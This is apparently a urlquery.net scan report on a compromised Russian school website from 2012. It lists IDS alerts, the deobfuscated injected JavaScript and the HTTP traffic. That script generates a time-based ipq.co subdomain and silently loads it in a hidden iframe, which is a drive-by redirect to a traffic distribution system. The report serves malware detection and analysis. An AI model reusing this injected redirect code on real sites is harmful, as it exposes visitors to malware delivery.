urlquery.net - Free url scanner

Overview

URL	http://www.sc62.lipetsk.ru/
IP	195.34.232.173
ASN	AS8570 OJSC Rostelecom
Location	Russian Federation
Report completed	2012-11-06 03:36:43 CET
Status	Loading report..
urlQuery Alerts	Detected a TDS URL pattern

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-06 03:36:10	195.34.232.173	urlQuery Client	1	ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 2)
2012-11-06 03:36:10	195.34.232.173	urlQuery Client	2	ET WEB_CLIENT eval String.fromCharCode String Which May Be Malicious
2012-11-06 03:36:11	195.34.232.173	urlQuery Client	3	FILEMAGIC Macromedia Flash data,
2012-11-06 03:36:11	195.34.232.173	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),
2012-11-06 03:36:11	195.34.232.173	urlQuery Client	3	FILEMAGIC Macromedia Flash data,
2012-11-06 03:36:11	195.34.232.173	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),
2012-11-06 03:36:11	195.34.232.173	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),
2012-11-06 03:36:11	195.34.232.173	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),

Snort /w Sourcefire VRT

No alerts detected

Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 195.34.232.173

Date	Alerts / IDS	URL	IP
2013-03-29 08:57:31	1 / 8	http://www.sc62.lipetsk.ru/link.htm	195.34.232.173
2013-03-25 15:20:24	1 / 8	http://www.sc62.lipetsk.ru/link.htm	195.34.232.173
2013-03-19 08:36:13	0 / 9	http://licey24.lipetsk.ru/english/presentation2.html	195.34.232.173
2013-03-14 02:22:11	2 / 3	http://zlpo.lipetsk.ru/index.htm	195.34.232.173
2013-03-04 01:13:18	2 / 3	http://zlpo.lipetsk.ru/bend_lgs.htm	195.34.232.173
2013-03-03 23:03:47	2 / 3	http://zlpo.lipetsk.ru/bend_lgr.htm	195.34.232.173

Last 6 reports on ASN: AS8570 OJSC Rostelecom

Date	Alerts / IDS	URL	IP
2013-03-29 08:57:31	1 / 8	http://www.sc62.lipetsk.ru/link.htm	195.34.232.173
2013-03-25 15:20:24	1 / 8	http://www.sc62.lipetsk.ru/link.htm	195.34.232.173
2013-03-19 08:36:13	0 / 9	http://licey24.lipetsk.ru/english/presentation2.html	195.34.232.173
2013-03-14 02:22:11	2 / 3	http://zlpo.lipetsk.ru/index.htm	195.34.232.173
2013-03-04 01:13:18	2 / 3	http://zlpo.lipetsk.ru/bend_lgs.htm	195.34.232.173
2013-03-03 23:03:47	2 / 3	http://zlpo.lipetsk.ru/bend_lgr.htm	195.34.232.173

Last 6 reports on domain: www.sc62.lipetsk.ru

Date	Alerts / IDS	URL	IP
2013-03-29 08:57:31	1 / 8	http://www.sc62.lipetsk.ru/link.htm	195.34.232.173
2013-03-25 15:20:24	1 / 8	http://www.sc62.lipetsk.ru/link.htm	195.34.232.173
2013-02-11 17:51:50	1 / 0	http://www.sc62.lipetsk.ru/24q.htm	195.34.232.173
2012-11-18 07:09:07	1 / 0	http://www.sc62.lipetsk.ru/	195.34.232.173
2012-11-14 06:57:37	1 / 8	http://www.sc62.lipetsk.ru/2.htm	195.34.232.173
2012-11-07 20:21:07	1 / 0	http://www.sc62.lipetsk.ru/7q.htm	195.34.232.173

JavaScript

Executed Scripts (5)

Executed Evals (1)

#1 JavaScript::Eval (size: 1704, repeated: 1)

function getMonthNum(abbMonth) {
    var arrMon = new Array("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec");
    var i;
    for (i = 0; i < arrMon.length; i++) {
        if (abbMonth == arrMon[i]) {
            return i;
        }
    }
    return -1;
}
function dateUTCdateToDate(dateString) {
    var arrDateStr = dateString.split(" ");
    var month = getMonthNum(arrDateStr[2]);
    var day = arrDateStr[1];
    var year = arrDateStr[3];
    var hour = arrDateStr[4].substr(0, 2);
    var minute = arrDateStr[4].substr(3, 2);
    var second = arrDateStr[4].substr(6, 2);
    return new Date(year, month, day, hour, minute, second);
}
function get_domain(y, m, d, h, prefix, postfix) {
    var chars = "k2pdh4qwej9j2rob51holnl3prxbkwhfp5ea";
    url = new String();
    for (var i = 0; i < 4; i++) {
        t = i;
        l = chars.length;
        t = (t + h) % l;
        url += chars.substr(t, 1);
        t = (t + d) % l;
        url += chars.substr(t, 1);
        t = (t + m) % l;
        url += chars.substr(t, 1);
        t = (t + y) % l;
        url += chars.substr(t, 1);
    }
    return (prefix + url + postfix).toLowerCase();
}
function get_current_domain(prefix, postfix) {
    var dt = new Date();
    var y = dt.getUTCFullYear();
    var m = dt.getMonth();
    var d = dt.getUTCDate();
    var h = dt.getUTCHours();
    return get_domain(y, m, d, Math.floor(h / 8), prefix, postfix);
}
var current_domain = "http://" + get_current_domain("g", "") + ".ipq.co/go.php?sid=3";
setTimeout(function() {
    try {
        var s = document.createElement("iframe");
        s.style.visibility = "hidden";
        s.style.display = "none";
        s.setAttribute("src", current_domain);
        document.body.appendChild(s)
    } catch (e) {}
}, 500);

Executed Writes (2)

#1 JavaScript::Write (size: 0, repeated: 1)

#2 JavaScript::Write (size: 314, repeated: 1)

<img src='http://counter.yadro.ru/hit?t45.6;rhttp%3A//www.sc62.lipetsk.ru/;s1176*885*24;uhttp%3A//h39086.srv0.test-hf.ru/go.php%3Fsid%3D1;h%u0421%u0430%u0439%u0442%20%u0437%u0430%u0431%u043B%u043E%u043A%u0438%u0440%u043E%u0432%u0430%u043D;0.28823289101178884' alt='' title='LiveInternet' border=0 width=1 height=1>

HTTP Transactions (23)

Request	Response
GET / HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:10 GMT Connection: close Last-Modified: Wed, 03 Oct 2012 10:03:09 GMT Etag: "3dd42f-5228-bee85140" Accept-Ranges: bytes Content-Length: 21032
GET /go.php?sid=1 HTTP/1.1 Host: h39086.srv0.test-hf.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Server: nginx/1.2.4 Date: Tue, 06 Nov 2012 02:36:10 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20 Vary: Accept-Encoding Last-Modified: Sat, 11 Feb 2012 16:51:38 GMT Etag: "2e7a07-869-4b8b30f0cda80" Content-Encoding: gzip
GET /Orion%20(Universal)%20Bonus%20Pack%20V1%20Desktop%20X.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:10 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:26 GMT Etag: "3dd430-f83e-cff07780" Accept-Ranges: bytes Content-Length: 63550
GET /Orion%20(Universal)%20V1b%20Icon%2038.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:10 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:27 GMT Etag: "3dd431-f83e-cfffb9c0" Accept-Ranges: bytes Content-Length: 63550
GET /Recycle.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:10 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:29 GMT Etag: "3dd433-f83e-d01e3e40" Accept-Ranges: bytes Content-Length: 63550
GET /Recycle%201.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:10 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:30 GMT Etag: "3dd432-f83e-d02d8080" Accept-Ranges: bytes Content-Length: 63550
GET /2.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:00 GMT Etag: "3dd427-8e-ce63bd00" Accept-Ranges: bytes Content-Length: 142
GET /3.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:00 GMT Etag: "3dd42a-5da-ce63bd00" Accept-Ranges: bytes Content-Length: 1498
GET /4.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:00 GMT Etag: "3dd42b-c71-ce63bd00" Accept-Ranges: bytes Content-Length: 3185
GET /1.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:22 GMT Etag: "3dd423-468f-cfb36e80" Accept-Ranges: bytes Content-Length: 18063
GET /ukfdyfz/%D0%B3%D0%BB%D0%B0%D0%B2%D0%BD%D0%B0%D1%8F.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 302 Found Content-Type: text/html; charset=iso-8859-1 Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Location: http://www.lipetsk.ru/errors/404.html Content-Length: 221
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1 Host: fpdownload2.macromedia.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/xml Server: Apache Last-Modified: Wed, 03 Oct 2012 19:48:11 GMT Etag: "289dff-26c-4cb2ceb2654c0" Accept-Ranges: bytes Content-Length: 620 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: keep-alive
GET /clock6.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:01 GMT Etag: "3dd42e-f58-ce72ff40" Accept-Ranges: bytes Content-Length: 3928
GET /style.css HTTP/1.1 Host: www.host-food.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://h39086.srv0.test-hf.ru/go.php?sid=1	HTTP/1.1 200 OK Content-Type: text/css Server: nginx/1.2.4 Date: Tue, 06 Nov 2012 02:36:12 GMT Last-Modified: Wed, 13 Apr 2011 13:57:32 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20 Vary: Accept-Encoding Content-Encoding: gzip
GET /5.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:20 GMT Etag: "3dd42d-3b73-cf94ea00" Accept-Ranges: bytes Content-Length: 15219
GET /hit?t45.6;rhttp%3A//www.sc62.lipetsk.ru/;s117688524;uhttp%3A//h39086.srv0.test-hf.ru/go.php%3Fsid%3D1;h%u0421%u0430%u0439%u0442%20%u0437%u0430%u0431%u043B%u043E%u043A%u0438%u0440%u043E%u0432%u0430%u043D;0.28823289101178884 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://h39086.srv0.test-hf.ru/go.php?sid=1	HTTP/1.1 302 Moved Temporarily Content-Type: text/html Date: Tue, 06 Nov 2012 02:36:12 GMT Server: 0W/0.8c Location: http://counter.yadro.ru/hit?q;t45.6;rhttp%3A//www.sc62.lipetsk.ru/;s117688524;uhttp%3A//h39086.srv0.test-hf.ru/go.php%3Fsid%3D1;h%u0421%u0430%u0439%u0442%20%u0437%u0430%u0431%u043B%u043E%u043A%u0438%u0440%u043E%u0432%u0430%u043D;0.28823289101178884 Content-Length: 32 Expires: Sun, 06 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: FTID=1Gc7US0drzn2; path=/; expires=Tue, 05 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /images/logo.png HTTP/1.1 Host: www.host-food.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.host-food.ru/style.css	HTTP/1.1 200 OK Content-Type: image/png Server: nginx/1.2.4 Date: Tue, 06 Nov 2012 02:36:12 GMT Content-Length: 11341 Last-Modified: Thu, 19 Jan 2012 21:20:54 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /hit?q;t45.6;rhttp%3A//www.sc62.lipetsk.ru/;s117688524;uhttp%3A//h39086.srv0.test-hf.ru/go.php%3Fsid%3D1;h%u0421%u0430%u0439%u0442%20%u0437%u0430%u0431%u043B%u043E%u043A%u0438%u0440%u043E%u0432%u0430%u043D;0.28823289101178884 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://h39086.srv0.test-hf.ru/go.php?sid=1 Cookie: FTID=1Gc7US0drzn2	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 02:36:12 GMT Server: 0W/0.8c Connection: Close Content-Length: 104 Expires: Sun, 06 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: VID=3KRk6B00xj12; path=/; expires=Tue, 05 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /setcookie.php?backurl=/errors/404.html& HTTP/1.1 Host: www.lipetsk.ru GET /setcookie.php?backurl=/errors/404.html& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 302 Found Content-Type: text/html; charset=windows-1251 Server: nginx/0.7.63 Date: Tue, 06 Nov 2012 02:36:12 GMT Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: Vzd=1; expires=Wed, 07 Nov 2012 02:36:12 GMT Location: http://www.lipetsk.ru/errors/404.html?pass=1&backurl=/errors/404.html&
GET /images/stop.png HTTP/1.1 Host: www.host-food.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.host-food.ru/style.css	HTTP/1.1 200 OK Content-Type: image/png Server: nginx/1.2.4 Date: Tue, 06 Nov 2012 02:36:12 GMT Content-Length: 10949 Last-Modified: Thu, 27 Jan 2011 15:47:38 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /errors/404.html?pass=1&backurl=/errors/404.html& HTTP/1.1 Host: www.lipetsk.ru GET /errors/404.html?pass=1&backurl=/errors/404.html& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/ Cookie: Vzd=1	HTTP/1.1 200 OK Content-Type: text/html; charset=windows-1251 Server: nginx/0.7.63 Date: Tue, 06 Nov 2012 02:36:12 GMT Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: Ccnt[/errors/404.html]=1; expires=Wed, 07 Nov 2012 02:36:12 GMT
GET /favicon.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:12 GMT Connection: close Last-Modified: Tue, 10 Jul 2007 10:48:55 GMT Etag: "3dd796-0-81fff3c0" Accept-Ranges: bytes Content-Length: 0
GET /go.php?sid=3 HTTP/1.1 Host: gkq522w1rpehodjob.ipq.co User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/

Request	Response
GET / HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:10 GMT Connection: close Last-Modified: Wed, 03 Oct 2012 10:03:09 GMT Etag: "3dd42f-5228-bee85140" Accept-Ranges: bytes Content-Length: 21032
GET /go.php?sid=1 HTTP/1.1 Host: h39086.srv0.test-hf.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Server: nginx/1.2.4 Date: Tue, 06 Nov 2012 02:36:10 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20 Vary: Accept-Encoding Last-Modified: Sat, 11 Feb 2012 16:51:38 GMT Etag: "2e7a07-869-4b8b30f0cda80" Content-Encoding: gzip
GET /Orion%20(Universal)%20Bonus%20Pack%20V1%20Desktop%20X.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:10 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:26 GMT Etag: "3dd430-f83e-cff07780" Accept-Ranges: bytes Content-Length: 63550
GET /Orion%20(Universal)%20V1b%20Icon%2038.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:10 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:27 GMT Etag: "3dd431-f83e-cfffb9c0" Accept-Ranges: bytes Content-Length: 63550
GET /Recycle.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:10 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:29 GMT Etag: "3dd433-f83e-d01e3e40" Accept-Ranges: bytes Content-Length: 63550
